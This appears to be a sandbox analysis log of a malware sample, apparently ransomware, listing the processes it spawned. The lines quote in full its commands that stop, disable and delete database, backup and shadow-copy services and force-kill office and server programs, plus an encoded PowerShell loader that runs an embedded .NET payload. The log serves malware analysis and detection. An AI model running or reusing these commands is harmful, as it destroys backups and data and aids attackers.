        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /IM Veeam.Backup.CloudService.exe & taskkill /F /IM Veeam.Backup.Manager.exe & taskkill /F /IM Veeam.Backup.MountService.exe & taskkill /F /IM Veeam.Backup.Service.exe & taskkill /F /IM Veeam.Backup.WmiServer.exe & taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe & taskkill /F /IM VeeamDeploymentSvc.exe & taskkill /F /IM VeeamNFSSvc.exe & taskkill /F /IM VeeamTransportSvc.exe & taskkill /F /IM sqlbrowser.exe & taskkill /F /IM sqlceip.exe & taskkill /F /IM sqlservr.exe & taskkill /F /IM sqlwriter.exe & taskkill /F /IM sqlagentc.exe & taskkill /F /IM ReportingServicesService.exe & taskkill /F /IM Ssms.exe & taskkill /F /IM fdhost.exe & taskkill /F /IM fdlauncher.exe & taskkill /F /IM MsDtsSrvr.exe & taskkill /F /IM msmdsrv.exe & taskkill /F /IM mysql.exe & taskkill /F /IM mysqld.exe & taskkill /F /IM w3wp.exe & taskkill /F /IM wsusservice.exe & taskkill /F /IM SageCSClient.exe & taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe & taskkill /F /IM Launchpad.exe & taskkill /F /IM dbsrv12.exe & taskkill /F /IM EXCEL.EXE & taskkill /F /IM OUTLOOK.EXE & taskkill /F /IM WINWORD.EXE & taskkill /F /IM OneDrive.exe & taskkill /F /IM TaskService.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "SQLSERVERAGENT"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "SQLSERVERAGENT"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete "MSSQLFDLauncher"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config MSSQLSERVER start=disabled
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM Tomcat7w.exe /F & @taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F & @taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F & @taskkill /IM Launchpad.exe /F & @taskkill /IM mpdwsvc.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete CobianBackup11 & @sc delete cbVSCService11 & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F & taskkill /F /IM store.exe & taskkill /F /IM MSExchangeMailboxReplication.exe & taskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe & taskkill /F /IM MSExchangeThrottling.exe & taskkill /F /IM EdgeTransport.exe & taskkill /F /IM MSExchangeTransportLogSearch.exe & taskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe & taskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe & taskkill /F /IM DataCollectorSvc.exe & taskkill /F /IM Microsoft.Exchange.ServiceHost.exe & taskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe & taskkill /F /IM MSExchangeMailboxAssistants.exe & taskkill /F /IM msexchangerepl.exe & taskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe & taskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe & taskkill /F /IM MsExchangeFDS.exe & taskkill /F /IM MSExchangeMailSubmission.exe & taskkill /F /IM MSExchangeTransport.exe & taskkill /F /IM Microsoft.Exchange.AntispamUpdateSvc.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "SQLBrowser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "MSOLAP$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config "SQL Server (MSSQLSERVER)" start=disabled
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "MSOLAP$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "SQLBrowser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.BrokerService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop MSSQL$
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM Tomcat7w.exe /F
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop MSSQL$
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "SQLTELEMETRY"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "MSSQL$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "SQLTELEMETRY"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM DDSoftPwsTomcat9.exe /F
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "MSSQL$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CatalogDataService.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc config MSSQL$ start=disabled
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc delete "XT800Service_Personal"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop SQLSERVERAGENT
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\net.exe net stop "MSSQLFDLauncher$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop SQLSERVERAGENT
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM U8SmartClient.exe /F
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM Veeam.Backup.CloudService.exe
        Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 stop "MSSQLFDLauncher$SHOPCONTROL9"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete OracleOraDb11g_home1ClrAgent & @sc delete OracleOraDb11g_home1TNSListener & @sc delete OracleVssWriterORCL & @sc delete OracleServiceORCL & @sc delete aspnet_state @sc delete Redis & @sc delete OracleVssWriterORCL & @sc delete JhTask & @sc delete ImeDictUpdateService & @sc delete XT800Service_Personal & @sc delete MCService & @sc delete ImeDictUpdateService & @sc delete allpass_redisservice_port21160 & @sc delete "Flash Helper Service" & @sc delete "Kiwi Syslog Server" & @sc delete "UWS HiPriv Services" & net stop MSSQL$FE_EXPRESS"
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\net1.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\attrib.exe attrib +s +h "C:\Users\user\Desktop\R1TftmQpuQ.bat".exeJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\Desktop\R1TftmQpuQ.bat.exe "C:\Users\user\Desktop\R1TftmQpuQ.bat".exe -wIn 1 -enC JABlAHgAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4ARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgBHAGUAdABDAHUAcgByAGUAbgB0AFAAcgBvAGMAZQBzAHMAKAApAC4ATQBhAGkAbgBNAG8AZAB1AGwAZQAuAEYAaQBsAGUATgBhAG0AZQA7ACAAJABsAGUAbgAgAD0AIAAkAGUAeABlAC4ATABlAG4AZwB0AGgAOwAkAGwAZQBuACAAPQAgACQAbABlAG4AIAAtACAANAA7ACQAVwBlAGIAVABpAHQAbABlACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAFQAeQBwAGUATgBhAG0AZQAgAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAFMAdAByAGkAbgBnAEIAdQBpAGwAZABlAHIAOwAgAGYAbwByAGUAYQBjAGgAIAAoACQAbABpAG4AZQAgAGkAbgAgAFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQATABpAG4AZQBzACgAJABlAHgAZQAuAFIAZQBtAG8AdgBlACgAJABsAGUAbgApACkAKQAgAHsAIABpAGYAIAAoACQAbABpAG4AZQAgAC0AbABpAGsAZQAgACcAKgAgAK4AKgAnACkAIAB7ACAAIAAkAFcAZQBiAFQAaQB0AGwAZQAuAEEAcABwAGUAbgBkACgAJABsAGkAbgBlAC4AUwBwAGwAaQB0ACgAJwCuACcAKQBbADEAXQApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAB9ACAAfQA7ACAAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAVwBlAGIAVABpAHQAbABlAC4AVABvAFMAdAByAGkAbgBnACgAKQApADsAJABpAG4AcAB1AHQAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ASQBPAC4ATQBlAG0AbwByAHkAUwB0AHIAZQBhAG0AKAAgACwAIAAkAGIAeQB0AGUAcwAgACkAOwAkAG8AdQB0AHAAdQB0ACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtADsAJABnAHoAaQBwAFMAdAByAGUAYQBtACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AIAAkAGkAbgBwAHUAdAAsACAAKABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbwBwAHkAVABvACgAIAAkAG8AdQB0AHAAdQB0ACAAKQA7ACQAZwB6AGkAcABTAHQAcgBlAGEAbQAuAEMAbABvAHMAZQAoACkAOwAkAGkAbgBwAHUAdAAuAEMAbABvAHMAZQAoACkAOwBbAGIAeQB0AGUAWwBdAF0AIAAkAGIAeQB0AGUAcwAgAD0AIAAkAG8AdQB0AHAAdQB0AC4AVABvAEEAcgByAGEAeQAoACkAOwBbAEEAcgByAGEAeQBdADoAOgBSAGUAdgBlAHIAcwBlACgAJABiAHkAdABlAHMAKQA7ACAAJABhAHMAcwBlAG0AYgBsAHkAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoACQAYgB5AHQAZQBzACkAOwAgACQAZQBuAHQAcgB5AFAAbwBpAG4AdABNAGUAdABoAG8AZAAgAD0AIAAkAGEAcwBzAGUAbQBiAGwAeQAuAEcAZQB0AFQAeQBwAGUAcwAoACkALgBXAGgAZQByAGUAKAB7ACAAJABfAC4ATgBhAG0AZQAgAC0AZQBxACAAJwBXAHIAZwB2AGcAcAByACcAIAB9ACwAIAAnAEYAaQByAHMAdAAnACkALgBHAGUAdABNAGUAdABoAG8AZAAoACcATQBhAGkAbgAnACwAIABbAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBCAGkAbgBkAGkAbgBnAEYAbABhAGcAcwBdACAAJwBTAHQAYQB0AGkAYwAsACAAUAB1AGIAbABpAGMALAAgAE4AbwBuAFAAdQBiAGwAaQBjACcAKQA7ACAAJABlAG4AdAByAHkAUABvAGkAbgB0AE0AZQB0AGgAbwBkAC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA=Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: unknown unknownJump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMgAwAA==Jump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\Bwmeldokiller.bat" "Jump to behavior
        Source: C:\Users\user\Desktop\R1TftmQpuQ.bat.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "SQLSERVERAGENT" & net stop "SQLBrowser" & net stop "SQLTELEMETRY" & net stop "MsDtsServer130" & net stop "SSISTELEMETRY130" & net stop "SQLWrite" & net stop "MSSQL$VEEAMSQL2012" & net stop "SQLAgent$VEEAMSQL2012" & net stop "MSSQL" & net stop "SQLAgent" & net stop "MSSQLServerADHelper100" & net stop "MSSQLServerOLAPService" & net stop "MsDtsServer100" & net stop "ReportServer" & net stop "SQLTELEMETRY$HL" & net stop "TMBMServer" & net stop "MSSQL$PROGID" & net stop "MSSQL$WOLTERSKLUWER" & net stop "SQLAgent$PROGID" & net stop "SQLAgent$WOLTERSKLUWER" & net stop "MSSQLFDLauncher$OPTIMA" & net stop "MSSQL$OPTIMA" & net stop "SQLAgent$OPTIMA" & net stop "ReportServer$OPTIMA" & net stop "msftesql$SQLEXPRESS" & net stop "postgresql-x64-9.4" & sc config "MSSQLFDLauncher" start= disabled & sc config "SQLSERVERAGENT" start= disabled & sc config "SQLBrowser" start= disabled"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & sc config MSSQLSERVER start=disabled & sc config "SQL Server (MSSQLSERVER)" start=disabled & net stop MSSQL$ & sc config MSSQL$ start=disabled & net stop SQLSERVERAGENT & sc config SQLSERVERAGENT start=disabled & net stop SQLBrowser & sc config SQLBrowser start=disabled & net stop vss & sc config vss start=disabled & net stop SQLWriter & sc config SQLWriter start=disabled & net stop vmvss & sc config vmvss start=disabled & sc config MSSQL$FE_EXPRESS start= disabled & net stop MSSQL$RE_EXPRESS & net stop SQLANYs_Sage_FAS_Fixed_Assets & sc config SQLANYs_Sage_FAS_Fixed_Assets start=disabled & net stop MSSQL$VIM_SQLEXP & sc config MSSQL$VIM_SQLEXP start=disabled & net stop "MSSQLFDLauncher" & net stop "MSSQLSERVER""Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & taskkill /F /IM Veeam.Backup.Agent.ConfigurationService.exe & taskkill /F /IM Veeam.Backup.BrokerService.exe & taskkill /F /IM Veeam.Backup.CatalogDataService.exe & taskkill /F /IM Veeam.Backup.CloudService.exe & taskkill /F /IM Veeam.Backup.Manager.exe & taskkill /F /IM Veeam.Backup.MountService.exe & taskkill /F /IM Veeam.Backup.Service.exe & taskkill /F /IM Veeam.Backup.WmiServer.exe & taskkill /F /IM Veeam.Guest.Interaction.Proxy.exe & taskkill /F /IM VeeamDeploymentSvc.exe & taskkill /F /IM VeeamNFSSvc.exe & taskkill /F /IM VeeamTransportSvc.exe & taskkill /F /IM sqlbrowser.exe & taskkill /F /IM sqlceip.exe & taskkill /F /IM sqlservr.exe & taskkill /F /IM sqlwriter.exe & taskkill /F /IM sqlagentc.exe & taskkill /F /IM ReportingServicesService.exe & taskkill /F /IM Ssms.exe & taskkill /F /IM fdhost.exe & taskkill /F /IM fdlauncher.exe & taskkill /F /IM MsDtsSrvr.exe & taskkill /F /IM msmdsrv.exe & taskkill /F /IM mysql.exe & taskkill /F /IM mysqld.exe & taskkill /F /IM w3wp.exe & taskkill /F /IM wsusservice.exe & taskkill /F /IM SageCSClient.exe & taskkill /F /IM UFSoft.U8.OC.QuartzScheduler.exe & taskkill /F /IM Launchpad.exe & taskkill /F /IM dbsrv12.exe & taskkill /F /IM EXCEL.EXE & taskkill /F /IM OUTLOOK.EXE & taskkill /F /IM WINWORD.EXE & taskkill /F /IM OneDrive.exe & taskkill /F /IM TaskService.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & net stop "MSOLAP$SHOPCONTROL9" & net stop "MSSQL$SHOPCONTROL9" & net stop "MSSQLFDLauncher$SHOPCONTROL9" & net stop "ReportServer$SHOPCONTROL9" & net stop "SQLAgent$SHOPCONTROL9" & net stop "NetBackup Client Service" & net stop "NetBackup Discovery Framework" & net stop "NetBackup Legacy Client Service" & net stop "NetBackup Legacy Network Service" & net stop "NetBackup Proxy Service" & net stop "NetBackup SAN Client Fibre Transport Service" & taskkill /IM mysqld-nt.exe /F & taskkill /IM NFVPrint.exe /F & taskkill /IM licenceserver.exe /F & taskkill /IM Launchpad.exe /F & taskkill /F /IM "FileZilla Server.exe" & taskkill /F /IM cbService.exe & taskkill /F /IM cbInterface.exe & taskkill /F /IM pvxwin32.exe & taskkill /F /IM pvxwin64.exe & taskkill /F /IM pvxcom.exe & taskkill /F /IM pvxiosvr.exe & taskkill /F /IM Sage.NA.AT_AU.SysTray.exe & taskkill /F /IM Sage.NA.AT_AU.Service.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM Tomcat7w.exe /F & @taskkill /IM "UFSoft.U8.OC.QuartzScheduler.exe" /F & @taskkill /IM UFSoft.U8.OC.QuartzScheduler.exe /F & @taskkill /IM Launchpad.exe /F & @taskkill /IM mpdwsvc.exe /F & @taskkill /IM cbVSCService11.exe /F & @taskkill /IM cbService.exe /F & @sc delete CobianBackup11 & @sc delete cbVSCService11 & @taskkill /IM mysqld-nt.exe /F & @taskkill /IM "Kingdee.K3.CRM.MMC.AutoService.exe" /F & @taskkill /IM sqlceip.exe /F & @taskkill /IM "Microsoft.SqlServer.IntegrationServices.MasterServiceHost.exe" /F & taskkill /F /IM store.exe & taskkill /F /IM MSExchangeMailboxReplication.exe & taskkill /F /IM Microsoft.Exchange.ProtectedServiceHost.exe & taskkill /F /IM MSExchangeThrottling.exe & taskkill /F /IM EdgeTransport.exe & taskkill /F /IM MSExchangeTransportLogSearch.exe & taskkill /F /IM Microsoft.Exchange.RpcClientAccess.Service.exe & taskkill /F /IM Microsoft.Exchange.AddressBook.Service.exe & taskkill /F /IM DataCollectorSvc.exe & taskkill /F /IM Microsoft.Exchange.ServiceHost.exe & taskkill /F /IM Microsoft.Exchange.ContentFilter.Wrapper.exe & taskkill /F /IM MSExchangeMailboxAssistants.exe & taskkill /F /IM msexchangerepl.exe & taskkill /F /IM Microsoft.Exchange.Search.ExSearch.exe & taskkill /F /IM Microsoft.Exchange.EdgeSyncSvc.exe & taskkill /F /IM MsExchangeFDS.exe & taskkill /F /IM MSExchangeMailSubmission.exe & taskkill /F /IM MSExchangeTransport.exe & taskkill /F /IM Microsoft.Exchange.AntispamUpdateSvc.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @taskkill /IM DDSoftPwsTomcat9.exe /F & @taskkill /IM U8SmartClient.exe /F & @taskkill /IM U8SmartClientMonitor.exe /F & @taskkill /IM tomcat9.exe /F & @taskkill /IM SqlManagement.exe /F & @sc delete "SiebelApplicationContainer_Siebel_Home_d_Siebel_sai" & @taskkill /IM ReportingServicesService.exe /F & @sc delete "ReportServer$SQLEXPRESS" & @sc delete TongBackupSrv & @taskkill /IM TongBackupSrv.exe /F & @taskkill /IM UFMsgCenterService.exe /F & @taskkill /IM "Cobian.exe" /F & @taskkill /IM "SAP Business One.exe" /F & @net stop "SQLBackupAndFTP Client Service" & @taskkill /IM "SqlBak.Service.exe" /F & @net stop cbVSCService & @net stop "SAP Business One RSP Agent Service" & @net stop SAPB1iDIProxy & @net stop "SAPB1iDIProxy_Monitor" & @net stop SAPB1iEventSender & @net stop SBOClientAgent & @net stop SBODI_Server & @net stop SBOJobServiceBackEnd & @net stop SBOMail & @net stop SBOWFDataAccess & @net stop SBOWorkflowuser"Jump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""Jump to behavior
